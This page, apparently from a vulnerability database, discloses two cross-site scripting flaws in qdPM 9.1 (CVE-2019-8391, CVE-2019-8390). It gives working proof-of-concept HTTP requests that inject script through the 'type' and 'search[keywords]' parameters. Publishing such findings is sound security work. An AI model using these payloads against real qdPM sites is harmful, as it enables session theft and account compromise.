Lucene search
qdPM 9.1 Cross Site Scripting
🗓️ 18 Feb 2019 00:00:00Reported by Mehmet EmirogluType 
packetstorm🔗 packetstormsecurity.com👁 28 Views
qdPM 9.1 Cross Site Scripting CVE-2019-8391 & CVE-2019-839
Show more
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Cross site scripting | 14 May 201915:29 | – | prion |
| Cross site scripting | 14 May 201916:29 | – | prion |
 | qdPM 9.1 - search[keywords] Cross-Site Scripting | 18 Feb 201900:00 | – | exploitpack |
| qdPM 9.1 - type Cross-Site Scripting | 18 Feb 201900:00 | – | exploitpack |
 | CVE-2019-8390 | 14 May 201915:29 | – | nvd |
| CVE-2019-8391 | 14 May 201916:29 | – | nvd |
 | qdPM 9.1 - 'search[keywords]' Cross-Site Scripting | 18 Feb 201900:00 | – | exploitdb |
| qdPM 9.1 - 'type' Cross-Site Scripting | 18 Feb 201900:00 | – | exploitdb |
 | CVE-2019-8391 | 14 May 201916:29 | – | cve |
| CVE-2019-8390 | 14 May 201915:29 | – | cve |
10
`===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391.
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET
/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>
HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
===========================================================================================
# Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection
# CVE: CVE-2019-8390
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
Free project management tool for small team
qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : search[keywords]
# Attack Pattern : e"><script>zi2u(9111)</script>
# POST Request : http://localhost/qdpm/index.php/configuration
===========================================================================================
POST /qdpm/index.php/users HTTP/1.1
Content-Length: 73
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo18 Feb 2019 00:00Current
EPSS0.02661